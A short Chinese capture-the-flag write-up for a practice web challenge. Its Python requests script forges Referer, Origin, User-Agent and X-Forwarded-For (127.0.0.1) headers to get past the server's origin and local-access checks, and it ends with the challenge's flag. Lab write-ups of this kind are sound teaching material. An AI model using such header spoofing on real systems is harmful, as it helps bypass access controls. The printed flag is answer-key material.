首先查看源碼,發現了Scret.php
訪問一下:
說我們不是從https://www.Sycsecret.com
訪問的,那就使用python修改請求頭:
import requests
url = 'http://node3.buuoj.cn:25765/Secret.php'
headers={"Referer":"https://www.Sycsecret.com","Origin":"https://www.Sycsecret.com"}
r = requests.get(url,headers=headers)
with open("1.html",'w')as f:
f.write(r.text)
運行一下,python自動將html代碼寫入到1.html中,打開1.html:
這裏提示我們需要使用”Syclover”瀏覽器,這裏直接修改UA頭即可,加一句headers['User-Agent'] = "Syclover"
import requests
url = 'http://node3.buuoj.cn:25765/Secret.php'
headers={"Referer":"https://www.Sycsecret.com","Origin":"https://www.Sycsecret.com"}
headers['User-Agent'] = "Syclover"
r = requests.get(url,headers=headers)
with open("1.html",'w')as f:
f.write(r.text)
locally,那就是需要本地訪問,即用XFF頭進行僞造,加一句headers['X-Forwarded-For'] = '127.0.0.1'
import requests
url = 'http://node3.buuoj.cn:25765/Secret.php'
headers={"Referer":"https://www.Sycsecret.com","Origin":"https://www.Sycsecret.com"}
headers['User-Agent'] = "Syclover"
headers['X-Forwarded-For'] = '127.0.0.1'
r = requests.get(url,headers=headers)
with open("1.html",'w')as f:
f.write(r.text)
flag{dea4ceac-5077-4d04-b0e3-7a7cf17ed028}
不會用python用BP也可以做,附上大佬博客:
https://www.cnblogs.com/wangtanzhi/p/12236844.html